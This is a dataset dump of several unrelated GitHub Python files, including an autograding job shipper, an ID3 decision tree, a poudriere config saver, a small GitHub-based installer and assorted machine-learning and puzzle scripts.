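            return fname           # interactive job: take it immediately
        if fallback == "":
            fallback = fname       # remember the oldest regrade as a fallback
    return fallback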
==================================================================================\ndef shipper_process(my_name,my_data,full_address,which_untrusted,overall_lock):\n \"\"\"\n Each shipper process spins in a loop, looking for a job that\n matches the capabilities of this machine, and then oversees the\n autograding of that job. Interactive jobs are prioritized over\n batch (regrade) jobs. If no jobs are available, the shipper waits\n on an event editing one of the queues.\n \"\"\"\n\n which_machine = full_address\n my_capabilities = my_data[my_name]['capabilities']\n\n # ignore keyboard interrupts in the shipper processes\n signal.signal(signal.SIGINT, signal.SIG_IGN)\n\n counter=0\n while True:\n try:\n my_job = get_job(my_name,which_machine,my_capabilities,which_untrusted,overall_lock)\n if not my_job == \"\":\n counter=0\n grade_queue_file(my_name,which_machine,which_untrusted,os.path.join(INTERACTIVE_QUEUE,my_job))\n continue\n else:\n if counter == 0 or counter >= 10:\n print (\"{0} {1}: no available job\".format(my_name, which_untrusted))\n counter=0\n counter+=1\n time.sleep(1)\n\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n my_message = \"ERROR in get_job {0} {1} {2}. For more details, see traces entry\".format(which_machine,which_untrusted,str(e))\n print (my_message)\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=my_message)\n time.sleep(1)\n\n\n\n# ==================================================================================\n# ==================================================================================\ndef launch_shippers(worker_status_map):\n # verify the DAEMON_USER is running this script\n if not int(os.getuid()) == int(DAEMON_UID):\n raise SystemExit(\"ERROR: the submitty_autograding_shipper.py script must be run by the DAEMON_USER\")\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"grade_scheduler.py launched\")\n\n # Clean up old files from previous shipping/autograding (any\n # partially completed work will be re-done)\n for file_path in Path(INTERACTIVE_QUEUE).glob(\"GRADING_*\"):\n file_path = str(file_path)\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"Remove old queue file: \" + file_path)\n os.remove(file_path)\n\n for file_path in Path(SUBMITTY_DATA_DIR, \"autograding_TODO\").glob(\"untrusted*\"):\n file_path = str(file_path)\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"Remove autograding TODO file: \" + file_path)\n os.remove(file_path)\n for file_path in Path(SUBMITTY_DATA_DIR, \"autograding_DONE\").glob(\"*\"):\n file_path = str(file_path)\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"Remove autograding DONE file: \" + file_path)\n os.remove(file_path)\n\n # this lock will be used to edit the queue or new job event\n overall_lock = multiprocessing.Lock()\n\n # The names of the worker machines, the capabilities of each\n # worker machine, and the number of workers per machine are stored\n # in the autograding_workers json.\n try:\n autograding_workers_path = os.path.join(SUBMITTY_INSTALL_DIR, 'config', \"autograding_workers.json\")\n with open(autograding_workers_path, 'r') as infile:\n autograding_workers = json.load(infile)\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n raise SystemExit(\"ERROR: could not locate the autograding workers json: 
{0}\".format(e))\n\n # There must always be a primary machine, it may or may not have\n # autograding workers.\n if not \"primary\" in autograding_workers:\n raise SystemExit(\"ERROR: autograding_workers.json contained no primary machine.\")\n\n # One (or more) of the machines must accept \"default\" jobs.\n default_present = False\n for name, machine in autograding_workers.items():\n if \"default\" in machine[\"capabilities\"]:\n default_present = True\n break\n if not default_present:\n raise SystemExit(\"ERROR: autograding_workers.json contained no machine with default capabilities\")\n\n # Launch a shipper process for every worker on the primary machine and each worker machine\n total_num_workers = 0\n processes = list()\n for name, machine in autograding_workers.items():\n if worker_status_map[name] == False:\n print(\"{0} could not be reached, so we are not spinning up shipper threads.\".format(name))\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"{0} could not be reached, so we are not spinning up shipper threads.\".format(name))\n continue\n if 'enabled' in machine and machine['enabled'] == False:\n print(\"{0} is disabled, so we are not spinning up shipper threads.\".format(name))\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"{0} is disabled, so we are not spinning up shipper threads.\")\n continue\n try:\n full_address = \"\"\n if machine[\"address\"] != \"localhost\":\n if machine[\"username\"] == \"\":\n raise SystemExit(\"ERROR: empty username for worker machine {0} \".format(machine[\"address\"]))\n full_address = \"{0}@{1}\".format(machine[\"username\"], machine[\"address\"])\n else:\n if not machine[\"username\"] == \"\":\n raise SystemExit('ERROR: username for primary (localhost) must be \"\"')\n full_address = machine['address']\n\n num_workers_on_machine = machine[\"num_autograding_workers\"]\n if num_workers_on_machine < 0:\n raise SystemExit(\"ERROR: num_workers_on_machine for '{0}' must be non-negative.\".format(machine))\n\n single_machine_data = {name : machine}\n single_machine_data = add_fields_to_autograding_worker_json(single_machine_data, name)\n except Exception as e:\n autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())\n print(\"ERROR: autograding_workers.json entry for {0} contains an error: {1}. 
For more details, see trace entry.\".format(name, e))\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"ERROR: autograding_workers.json entry for {0} contains an error: {1} For more details, see trace entry.\".format(name,e))\n continue\n # launch the shipper threads\n for i in range(0,num_workers_on_machine):\n u = \"untrusted\" + str(i).zfill(2)\n p = multiprocessing.Process(target=shipper_process,args=(name,single_machine_data,full_address, u,overall_lock))\n p.start()\n processes.append(p)\n total_num_workers += num_workers_on_machine\n\n # main monitoring loop\n try:\n while True:\n alive = 0\n for i in range(0,total_num_workers):\n if processes[i].is_alive:\n alive = alive+1\n else:\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"ERROR: process \"+str(i)+\" is not alive\")\n if alive != total_num_workers:\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"ERROR: #shippers=\"+str(total_num_workers)+\" != #alive=\"+str(alive))\n #print (\"shippers= \",total_num_workers,\" alive=\",alive)\n time.sleep(1)\n\n except KeyboardInterrupt:\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"grade_scheduler.py keyboard interrupt\")\n # just kill everything in this group id right now\n # NOTE: this may be a bug if the grandchildren have a different group id and not be killed\n os.kill(-os.getpid(), signal.SIGKILL)\n\n # run this to check if everything is dead\n # ps xao pid,ppid,pgid,sid,comm,user | grep untrust\n\n # everything's dead, including the main process so the rest of this will be ignored\n # but this was mostly working...\n\n # terminate the jobs\n for i in range(0,total_num_workers):\n processes[i].terminate()\n # wait for them to join\n for i in range(0,total_num_workers):\n processes[i].join()\n\n autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=\"grade_scheduler.py terminated\")\n\n\n# ==================================================================================\nif __name__ == \"__main__\":\n # verify the DAEMON_USER is running this script\n if not int(os.getuid()) == int(DAEMON_UID):\n raise SystemExit(\"ERROR: the submitty_autograding_shipper.py script must be run by the DAEMON_USER\")\n\n worker_status_map = update_all_foreign_autograding_workers()\n launch_shippers(worker_status_map)\n","repo_name":"VictoriaSavage526/Submitty","sub_path":"sbin/submitty_autograding_shipper.py","file_name":"submitty_autograding_shipper.py","file_ext":"py","file_size_in_byte":42995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72647626026","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\nimport torch\r\nfrom torchvision import datasets, models, transforms\r\nimport torch.nn as nn\r\nfrom torch.nn import functional as F\r\nimport torch.optim as optim\r\nimport torchvision\r\nimport cv2\r\nimport glob\r\n\r\ndef dip(f):\r\n image = cv2.imread(f)\r\n edges = cv2.Canny(image, 50, 95)\r\n \r\n # 使用Hough Line Transform檢測直線\r\n lines = cv2.HoughLinesP(edges, 1, np.pi/180, threshold=100, minLineLength=100, maxLineGap=10)\r\n\r\n # 找到最下面的直線\r\n if lines is not None:\r\n # 將直線根據Y座標進行排序\r\n lines = sorted(lines, key=lambda line: line[0][1], reverse=True)\r\n \r\n # 繪製最下面的直線(假設只有一條)\r\n x1, y1, x2, y2 = lines[0][0]\r\n print(x1, y1, x2, y2)\r\n cv2.line(image, (x1, y1), (x2, y2), (0, 0, 255), 2)\r\n cv2.imshow('crop1',image)\r\n cv2.waitKey(0)\r\n\r\n img = image[y1-60:y1-15,:]\r\n 
print(img.shape)\r\n alpha = 100.5 #對比\r\n beta = 12 #亮度\r\n img = cv2.GaussianBlur(img,(5,5),1)\r\n cv2.imshow('crop1',img)\r\n cv2.waitKey(0)\r\n enhance = cv2.convertScaleAbs(img, alpha, beta)\r\n cv2.imshow('enhance',enhance)\r\n cv2.waitKey(0)\r\n return enhance\r\n\r\ndef load_model():\r\n return\r\n\r\ndef test(img_f):\r\n num_classes = 2\r\n\r\n # 创建ResNet-50模型\r\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n model = models.resnet50(pretrained=False).to(device)\r\n model.fc = nn.Sequential(\r\n nn.Linear(2048, 128),\r\n nn.ReLU(inplace=True),\r\n nn.Linear(128, num_classes)).to(device)\r\n model.load_state_dict(torch.load('models/validation loss_ 0.0254 acc_ 0.9957best.h5'))\r\n model.eval() # 将模型设置为评估模式\r\n transform = transforms.Compose([\r\n transforms.Resize((45,640)),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ])\r\n mypath = glob.glob(\"./ng/*jpg\")\r\n for f in mypath:\r\n # 加载待预测的图像\r\n # image = Image.open(f)\r\n image = Image.fromarray(dip(f))\r\n image = transform(image).to(device)\r\n image = image.unsqueeze(0) # 添加一个维度,以匹配模型的输入形状\r\n\r\n pred_logits_tensor = model(image)\r\n # print(pred_logits_tensor)\r\n pred_probs = F.softmax(pred_logits_tensor, dim=1).cpu().data.numpy()\r\n # print(pred_probs)\r\n print(\"{:.0f}% NG, {:.0f}% OK\".format(100*pred_probs[0,0],\r\n 100*pred_probs[0,1]))\r\n\r\ntest('')","repo_name":"MerryKo/LSRC","sub_path":"resnet_test_one.py","file_name":"resnet_test_one.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37371369354","text":"import logging\nimport itertools\nimport os\nimport attr\nimport shutil\nfrom poudriere_saver import option_grammar\n\nLOGGER = logging.getLogger(\"pty\")\n\n\n@attr.s\nclass Jail(object):\n name = attr.ib()\n version = attr.ib()\n arch = attr.ib()\n\n\n@attr.s\nclass Port(object):\n name = attr.ib()\n path = attr.ib()\n\n\ndef build_filename(jail, port, _set, tail):\n segs = []\n if jail is not None:\n segs.append(jail.name)\n if port is not None:\n segs.append(port.name)\n if _set is not None:\n segs.append(_set)\n segs.append(tail)\n return jail, port, _set, \"-\".join(segs)\n\n\n# See man poudriere for informations about file order\ndef generate_files2(jails, ports, sets, tail):\n yield None, None, None, tail\n # sets\n for s in sets:\n yield build_filename(None, None, s, tail)\n # ports\n for p in ports:\n yield build_filename(None, p, None, tail)\n # jail\n for j in jails:\n yield build_filename(j, None, None, tail)\n # ports sets\n for p, s in itertools.product(ports, sets):\n yield build_filename(None, p, s, tail)\n # jails ports\n for j, p in itertools.product(jails, ports):\n yield build_filename(j, p, None, tail)\n # jails sets\n for j, s in itertools.product(jails, sets):\n yield build_filename(j, None, s, tail)\n # jails ports sets\n for j, p, s in itertools.product(jails, ports, sets):\n yield build_filename(j, p, s, tail)\n\n\n# Same thing, but build absolute path, and drop those that don't exists\ndef generate_files(root_dir, j, p, s, t):\n for j, p, s, f in generate_files2(j, p, s, t):\n path = os.path.join(root_dir, f)\n if os.path.exists(path):\n yield j, p, s, os.path.abspath(path)\n\n\ndef generate_options_files(r, j, p, s):\n return reversed(tuple(generate_files(r, j, p, s, \"options\")))\n\n\ndef generate_make_conf_files(r, j, p, s):\n return generate_files(r, j, p, s, 
\"make.conf\")\n\n\n# Same thing with blacklist, poudriere\n\n\n# Load every option in this directory\n# Return a dictionnary of category, where every element is a port\ndef load_option_directories(option_dir):\n LOGGER.debug(\"Load option directory %s\", option_dir)\n res = {}\n for dir_name in os.listdir(option_dir):\n split = dir_name.split(\"_\")\n category = split[0]\n name = \"_\".join(split[1:])\n opt_file = os.path.join(option_dir, dir_name, \"options\")\n if os.path.isfile(opt_file):\n LOGGER.debug(\n \"Load port %s/%s configuration from %s\", category, name, opt_file\n )\n with open(opt_file) as fd:\n c = option_grammar.parse(fd)\n if category not in res:\n res[category] = {name: c}\n else:\n res[category][name] = c\n else:\n LOGGER.warning(\"%s no such file in %s\", opt_file, option_dir)\n return res\n\n\n# Load options from this directory\ndef load_options(root_dir, jails, ports, sets):\n LOGGER.debug(\"Load options files from %s\", root_dir)\n opts = []\n opt_files = generate_options_files(root_dir, jails, ports, sets)\n for jail, port, _set, opt_dir in opt_files:\n opt = {}\n if jail is not None:\n opt[\"jail\"] = attr.asdict(jail)\n if port is not None:\n opt[\"tree\"] = attr.asdict(port)\n if _set is not None:\n opt[\"set\"] = _set\n opt[\"ports\"] = load_option_directories(opt_dir)\n opts.append(opt)\n return opts\n\n\ndef load_make_conf_files(root_dir, jails, ports, sets):\n LOGGER.debug(\"Load make.conf from %s\", root_dir)\n conf = []\n conf_files = generate_make_conf_files(root_dir, jails, ports, sets)\n for jail, port, _set, make_conf in conf_files:\n c = {}\n if jail is not None:\n c[\"jail\"] = attr.asdict(jail)\n if port is not None:\n c[\"tree\"] = attr.asdict(port)\n if _set is not None:\n c[\"set\"] = _set\n LOGGER.debug(\"Load configuration file %s\", make_conf)\n with open(make_conf) as conf_fd:\n c[\"conf\"] = option_grammar.parse(conf_fd)\n conf.append(c)\n return conf\n\n\ndef write_conf_file(path, conf):\n def write(l):\n fd.write(l + \"\\n\")\n\n with open(path, \"w\") as fd:\n write(\"# This file was generated by poudriere_saver\")\n # For now, only one operator is supported\n for o, values in conf.items():\n for v in values:\n write(f\"{o}+={v}\")\n\n\ndef write_port_options(parent_dir, category, port, conf):\n pdir_name = f\"{category}_{port}\"\n pdir_path = os.path.join(parent_dir, pdir_name)\n pconf_path = os.path.join(pdir_path, \"options\")\n LOGGER.debug(\"Create port %s/%s configurations\", category, port)\n os.mkdir(pdir_path)\n write_conf_file(pconf_path, conf)\n\n\ndef get_segment_filename(segment, tail):\n if \"jail\" in segment:\n jail = Jail(\n segment[\"jail\"][\"name\"], segment[\"jail\"][\"version\"], segment[\"jail\"][\"arch\"]\n )\n else:\n jail = None\n if \"tree\" in segment:\n port = Port(segment[\"tree\"][\"name\"], segment[\"tree\"][\"path\"])\n else:\n port = None\n _set = segment.get(\"set\", None)\n _, _, _, name = build_filename(jail, port, _set, tail)\n return name\n\n\ndef write_options(conf, dest_dir):\n LOGGER.debug(\"Write options files in %s\", dest_dir)\n for seg in conf:\n dir_path = os.path.join(dest_dir, get_segment_filename(seg, \"options\"))\n # If this directory exists, drop it\n if os.path.exists(dir_path):\n LOGGER.warning(\"Delete previous %s\", dir_path)\n shutil.rmtree(dir_path)\n else:\n LOGGER.debug(\"Create %s\", dir_path)\n os.makedirs(dir_path)\n for category in seg.get(\"ports\", {}):\n for port, c in seg[\"ports\"][category].items():\n write_port_options(dir_path, category, port, c)\n\n\ndef 
write_make_conf(conf, dest_dir):\n LOGGER.debug(\"Write make.conf files in %s\", dest_dir)\n for seg in conf:\n file_path = os.path.join(dest_dir, get_segment_filename(seg, \"make.conf\"))\n LOGGER.debug(\"Write %s\", file_path)\n write_conf_file(file_path, seg[\"conf\"])\n\n\nCLEAN_DIRECTORY_IGNORE_FILENAMES = (\"jails\", \"ports\")\n\n\ndef clean_directory(dir_path):\n # Drop every file in directory but those which must remains to keep\n # poudriere working\n for n in os.listdir(dir_path):\n if n not in CLEAN_DIRECTORY_IGNORE_FILENAMES:\n path = os.path.join(dir_path, n)\n if os.path.isdir(path):\n shutil.rmtree(path)\n else:\n os.unlink(path)\n","repo_name":"OnyxMsi/poudriere_saver","sub_path":"poudriere_saver/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22207088688","text":"import urllib.request\nimport os\n\n# install install.txt\n# txt file containing list of files\n\n\n\ndef find_files(file):\n with open(file) as f:\n content = f.readlines()\n # you may also want to remove whitespace characters like `\\n` at the end of each line\n return [x.strip() for x in content]\n\n\n\ndef install():\n for content in contents:\n url = 'https://github.com/imifk/pathfinder/blob/master/{}?raw=true'.format(content)\n print('downloading {} '.format(content), end=\"\\r\")\n f = urllib.request.urlopen(url)\n file = f.read()\n f.close()\n f2 = open(content, 'wb')\n f2.write(file)\n f2.close()\n return\n\ndef reinstall():\n try:\n f = open(\"install.txt\")\n contents = find_files('install.txt')\n print('deleting old files . . .')\n print(contents)\n for content in contents:\n print(content)\n os.remove(content)\n f.close()\n os.remove('install.txt')\n except IOError:\n print(\"File not accessible\")\n finally:\n pass\n\ndef hide_file():\n os.system(f'attrib +h install.txt')\n for content in contents:\n os.system(f'attrib +h {content}')\n os.system('attrib -h Pathinator.exe')\n return\n\nreinstall()\n\nurl = 'https://github.com/imifk/pathfinder/blob/master/install.txt?raw=true'\n\nf = urllib.request.urlopen(url)\nfile = f.read()\nf.close()\nf2 = open('install.txt', 'wb')\nf2.write(file)\nf2.close()\n\ncontents = find_files('install.txt')\nprint(f'downloading {contents}')\n\ninstall()\n\nhide_file()\n\nprint('finished ')\nprint('if install.txt is present.')\nprint('re-run software')\nprint('. . 
.')\ninput(\"Press Enter to exit...\")\n\n","repo_name":"imkuro02/pathfinder","sub_path":"installer.py","file_name":"installer.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13260414998","text":"import csv\nfrom collections import Counter\nfrom math import log2\n\ndef load_data(path):\n data = []\n with open(path, 'r') as file:\n csv_reader = csv.DictReader(file)\n for row in csv_reader:\n data.append(row)\n return data\n \n\nclass Node:\n def __init__(self, value, children):\n self.value = value\n self.children = children\n\nclass Leaf:\n def __init__(self, value):\n self.value = value\n \nclass Id3:\n \n def __init__(self, hiperparam=None):\n self.root= None\n self.hiperparam = hiperparam\n \n \n def fit(self, dataset):\n x = list(dataset[0].keys())[:-1]\n self.root = self.id3(dataset,dataset, x)\n print('[BRANCHES]:')\n self.print_tree(self.root)\n \n\n def predict(self, test_dataset):\n predictions = []\n for x in test_dataset:\n predictions.append(self.predict_part(x, self.root))\n print('[PREDICTIONS]:', ' '.join(predictions))\n return predictions\n\n def predict_part(self, x, root):\n if isinstance(root, Leaf):\n return root.value\n else:\n for value, child in root.children:\n if x[root.value] == value:\n return self.predict_part(x, child)\n return 'maybe'\n \n\n \n def id3(self, d, d_par, X, depth=0):\n \n \n if depth == self.hiperparam:\n return Leaf(self.most_common_label(d))\n \n if not d:\n return Leaf(self.most_common_label(d_par))\n \n v = self.most_common_label(d)\n \n if not X or self.entropy(d) == 0:\n return Leaf(v)\n \n x = self.most_discriminating_feature(d,X)\n \n subtrees = []\n \n vals = set()\n for row in d:\n vals.add(row[x])\n\n for value in vals:\n t = self.id3(self.remove_feature_from_dataset(d,x,value),d,self.remove_feature_from_list(X,x), depth+1)\n subtrees.append((value,t))\n\n return Node(x,subtrees)\n \n\n def print_tree(self, root, path=[], depth=1):\n if isinstance(root, Leaf):\n print(' '.join(path) + ' ' + root.value)\n else:\n for value, child in root.children:\n new_path = path + [str(depth) + \":\" + root.value + \"=\" + value]\n self.print_tree(child, new_path, depth+1)\n\n\n \n def most_discriminating_feature(self,dataset, x):\n igs = {}\n for i in x:\n igs[i] = self.information_gain(dataset,i)\n print('IG(' + i + ') = ' + str(igs[i]))\n \n sorted_igs = dict(sorted(igs.items()))\n\n return max(sorted_igs, key=sorted_igs.get)\n \n def remove_feature_from_dataset(self, dataset, feature , value):\n new_dataset = []\n \n for row in dataset:\n if row[feature] == value:\n new_dataset.append(row)\n return new_dataset\n \n def remove_feature_from_list(self, X, x):\n new_list = []\n \n for k in X:\n if k != x:\n new_list.append(k)\n \n return new_list\n \n\n def most_common_label(self, dataset):\n labels = self.get_labels(dataset)\n labels.sort()\n counter = Counter(labels)\n return counter.most_common(1)[0][0]\n\n \n def entropy(self, dataset):\n labels = self.get_labels(dataset)\n freq = Counter(labels)\n ent = 0\n for x in freq:\n prob = freq[x] / len(labels)\n ent -= prob * log2(prob)\n return ent\n\n def information_gain(self, dataset, feature):\n feature_values = []\n for row in dataset:\n feature_values.append(row[feature])\n \n counter = Counter(feature_values)\n init_entropy = self.entropy(dataset)\n expected_entropy = self.calculate_expected_entropy_sum(dataset, feature, counter)\n gain = init_entropy - expected_entropy\n return gain\n\n 
def calculate_expected_entropy_sum(self, dataset, feature, counter):\n sum = 0\n for val in counter:\n prob = counter[val] / len(dataset)\n subset = self.subset(dataset, feature, val)\n entropy_of_subset = self.entropy(subset)\n expected_ent = prob * entropy_of_subset\n sum += expected_ent\n return sum\n\n \n def subset(self, dataset, feature, value):\n subset = []\n for row in dataset:\n if row[feature] == value:\n subset.append(row)\n return subset\n\n def calculate_and_print_accuracy(self, dataset, predictions):\n true_labels = self.get_labels(dataset)\n correct = 0\n for true, pred in zip(true_labels, predictions):\n if true == pred:\n correct += 1\n accuracy = correct / len(true_labels)\n print('[ACCURACY]:', f'{accuracy:.5f}')\n return accuracy\n\n \n def get_labels(self, dataset):\n labels = []\n for row in dataset:\n last_key = list(row.keys())[-1]\n label = row[last_key]\n labels.append(label)\n return labels\n \n def calculate_confusion_matrix(self, dataset, predictions):\n labels_dataset = self.get_labels(dataset)\n\n unique_labels = sorted(list(set(labels_dataset)))\n\n num_labels = len(unique_labels)\n\n matrix = []\n for _ in range(num_labels):\n row = [0] * num_labels\n matrix.append(row)\n \n for true_label, predicted_label in zip(labels_dataset, predictions):\n true_index = unique_labels.index(true_label)\n predicted_index = unique_labels.index(predicted_label)\n matrix[true_index][predicted_index] += 1\n\n self.print_confusion_matrix(matrix)\n\n return matrix\n\n def print_confusion_matrix(self, matrix):\n print('[CONFUSION_MATRIX]:')\n for row in matrix:\n print(' '.join(map(str, row)))\n\n\n\nimport sys\ndef main():\n train_data = load_data(sys.argv[1])\n test_data = load_data(sys.argv[2])\n \n if len(sys.argv) == 3:\n hiperparam = None\n id3 = Id3()\n else:\n hiperparam = int(sys.argv[3])\n id3 = Id3(hiperparam)\n\n id3.fit(train_data)\n predictions = id3.predict(test_data)\n id3.calculate_and_print_accuracy(test_data, predictions)\n \n #if(len(set(predictions)) > 0):\n id3.calculate_confusion_matrix(test_data, predictions)\n \n\nif __name__ == '__main__':\n main()\n \n \n\n \n \n \n\n \n ","repo_name":"zzunic2123/introduction-to-artificial-intelligence","sub_path":"lab3/lab3.py","file_name":"lab3.py","file_ext":"py","file_size_in_byte":6579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1886621715","text":"from mmf.common.registry import registry\nfrom mmf.datasets.builders.girasoles_sensor.dataset import GirasolesSensorDataset\nfrom mmf.datasets.mmf_dataset_builder import MMFDatasetBuilder\n\n\n@registry.register_builder(\"girasoles_sensor\")\nclass GirasolesSensorBuilder(MMFDatasetBuilder):\n def __init__(\n self, dataset_name=\"girasoles_sensor\", dataset_class=GirasolesSensorDataset, *args, **kwargs\n ):\n super().__init__(dataset_name, dataset_class, *args, **kwargs)\n\n @classmethod\n def config_path(cls):\n return \"configs/datasets/girasoles_sensor/defaults.yaml\"","repo_name":"Emory-AIMS/Multi-Sensor","sub_path":"mmf/datasets/builders/girasoles_sensor/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26327571509","text":"with open('input.txt', 'r') as input_file:\n lines = [line.strip() for line in input_file.readlines() if len(line) > 1]\n\n\ndef parse(line):\n depths = []\n values = []\n depth = 0\n for char in line:\n if char == '[':\n depth += 1\n elif char 
== ']':\n depth -= 1\n elif char in '0123456789':\n depths.append(depth)\n values.append(int(char))\n return depths, values\n\ndef reduce(values, depths):\n print(f\"\\nvalues: {values}\\ndepths: {depths}\")\n for i, (depth, value) in enumerate(zip(depths, values)):\n\n if depth > 4 and i < len(depths) - 1 and depths[i + 1] == depth:\n print(\"Explode\")\n if i - 1 >= 0:\n values[i - 1] += value\n if i + 2 < len(values):\n values[i + 2] += values[i + 1]\n\n values = values[:i] + [0] + values[i + 2:]\n depths = depths[:i] + [depth - 1] + depths[i + 2:]\n break\n elif value > 9:\n print(\"Split\")\n values = values[:i] + [value // 2, value // 2 + value % 2] + values[i + 1:]\n depths = depths[:i] + [depth + 1, depth + 1] + depths[i + 1:]\n break\n else:\n print('done')\n print(f\"\\nvalues: {values}\\ndepths: {depths}\")\n return values, depths\n\ndef add(v1, d1, v2, d2):\n depths = [d+1 for d in d1] + [d+1 for d in d2]\n values = v1+v2\n return reduce(values, depths)\n\nprint(add(*parse(lines[0]), *parse(lines[1])))\n\n","repo_name":"LLinville/misc_code","sub_path":"advent2021/18/day18.py","file_name":"day18.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3996512457","text":"\nimport numpy \nimport matplotlib.pyplot as plot\n\n\ndef y(x):\n return numpy.exp(-x) * numpy.sin(2 * x + numpy.pi / 3)\n\n\nx = numpy.linspace(-2 * numpy.pi, 2 * numpy.pi, 1000)\n\n\ny = y(x)\n\n\nplot.plot(x, y)\n\n\nplot.xlabel('x')\n\nplot.ylabel('y')\n\nplot.title('y = e^(-x) * sin(2x + pi/3), -2pi ≤ x ≤ 2pi')\n\n\nplot.show()\n","repo_name":"floff02/Skills-Audit","sub_path":"graph_plotting.py","file_name":"graph_plotting.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38475305007","text":"import click as click\nimport cv2, time, os, sys\nfrom ascii import render\n\n\n@click.command()\n@click.option('--input', prompt='Input image file', help='Input image')\n@click.option('--output', default='', help='Output txt (print to console if not set)')\n@click.option('--height', default=50, help='ASCII art height (0 for terminal height)')\n@click.option('--gradient', default=' .:!/r(l1Z4H9W8$@', help='Symbols for output (from the darkest to brightest)')\n@click.option('--font-aspect', default='7/15', help='Symbol aspect (default for Cascadia Code font) Pattern: x/y')\ndef main(input: str, output: str, height: int, gradient: str, font_aspect: str):\n img = cv2.imread(input)\n frame = img\n frame_h, frame_w, _ = frame.shape\n aspect = frame_w / frame_h\n\n if height == 0:\n height = os.get_terminal_size().lines\n\n font_aspect = tuple(map(int, font_aspect.split('/')))\n symbol_aspect = font_aspect[0] / font_aspect[1]\n\n resolution = (round(height * aspect / symbol_aspect), height)\n frame = cv2.resize(frame, resolution, interpolation=cv2.INTER_AREA)\n art = render(frame, gradient)\n\n if output != '':\n with open(output, 'w') as f:\n f.write(art)\n else:\n print(art)\n\n\nif __name__ == '__main__':\n main()","repo_name":"barabum0/python-ascii","sub_path":"image2ascii.py","file_name":"image2ascii.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71368012587","text":"# follow FS-Net\nimport torch.nn as nn\nimport network.fs_net_repo.gcn3d as gcn3d\nimport torch\nimport torch.nn.functional as F\nfrom absl import 
app\nimport absl.flags as flags\nfrom network.fs_net_repo.pcl_encoder import PCL_Encoder\nFLAGS = flags.FLAGS\nfrom mmcv.cnn import normal_init, constant_init\nfrom torch.nn.modules.batchnorm import _BatchNorm\n\n# global feature num : the channels of feature from rgb and depth\n# grid_num : the volume resolution\n\nclass FaceRecon(nn.Module):\n def __init__(self):\n super(FaceRecon, self).__init__()\n self.neighbor_num = FLAGS.gcn_n_num\n self.support_num = FLAGS.gcn_sup_num\n # 3D convolution for point cloud\n self.recon_num = 3\n self.face_recon_num = FLAGS.face_recon_c\n\n dim_fuse = sum([128, 128, 256, 256, 512, FLAGS.obj_c, FLAGS.feat_seman])\n # 16: total 6 categories, 256 is global feature\n self.conv1d_block = nn.Sequential(\n nn.Conv1d(dim_fuse, 512, 1),\n nn.BatchNorm1d(512),\n nn.ReLU(inplace=True),\n nn.Conv1d(512, 512, 1),\n nn.BatchNorm1d(512),\n nn.ReLU(inplace=True),\n nn.Conv1d(512, 256, 1),\n nn.BatchNorm1d(256),\n nn.ReLU(inplace=True),\n )\n\n self.recon_head = nn.Sequential(\n nn.Conv1d(256, 128, 1),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n nn.Conv1d(128, self.recon_num, 1),\n )\n\n self.face_decoder = nn.Sequential(\n nn.Conv1d(FLAGS.feat_face + 3, 512, 1),\n nn.BatchNorm1d(512),\n nn.ReLU(inplace=True),\n nn.Conv1d(512, 256, 1),\n nn.BatchNorm1d(256),\n nn.ReLU(inplace=True),\n )\n\n self.vote_head_1= VoteHead()\n self.vote_head_2= VoteHead()\n self.vote_head_3= VoteHead()\n self.vote_head_4= VoteHead()\n self.vote_head_5= VoteHead()\n self.vote_head_6= VoteHead()\n self.vote_head_list = [self.vote_head_1, self.vote_head_2, self.vote_head_3,\n self.vote_head_4, self.vote_head_5, self.vote_head_6]\n self.mask_head = nn.Sequential(\n nn.Conv1d(256, 128, 1),\n nn.BatchNorm1d(128),\n nn.ReLU(inplace=True),\n nn.Conv1d(128, 1, 1),\n nn.Sigmoid()\n )\n 